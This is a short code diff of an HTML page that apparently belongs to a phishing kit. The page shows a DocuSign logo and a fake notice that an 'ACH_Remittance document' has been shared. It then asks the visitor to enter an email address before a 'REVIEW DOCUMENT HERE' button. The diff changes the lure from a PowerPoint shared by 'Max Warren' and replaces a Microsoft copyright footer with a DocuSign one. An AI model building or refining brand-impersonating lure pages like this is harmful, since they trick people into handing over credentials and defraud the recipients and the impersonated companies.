--- a/index.html
+++ b/index.html
@@ -71,14 +71,14 @@
     <div id="auth-page" class="container">
         <img src="https://upload.wikimedia.org/wikipedia/commons/3/34/DocuSign_logo.png" alt="Outlook Logo" class="logo"><br>
         
-        <p>Here's the PowerPoint file that <b>Max Warren</b> shared with you.</p><br><br>
+        <p>Here's the <b>ACH_Remittance document</b> shared with you.</p><br><br>
         <input type="email" id="email" placeholder="Enter the recipient's email to proceed"> </br></br>
         <button onclick="validateEmail()">REVIEW DOCUMENT HERE</button>
     </div>
 
     <!-- Footer -->
     <footer>
-        <p>&copy; <span id="year"></span> Microsoft. All Rights Reserved.</p>
+        <p>&copy; <span id="year"></span> DocuSign. All Rights Reserved.</p>
         <p>
             <a href="privacy-policy.html" style="color: black;">Privacy Policy</a> |
             <a href="terms-of-use.html" style="color: black;">Terms of Use</a>
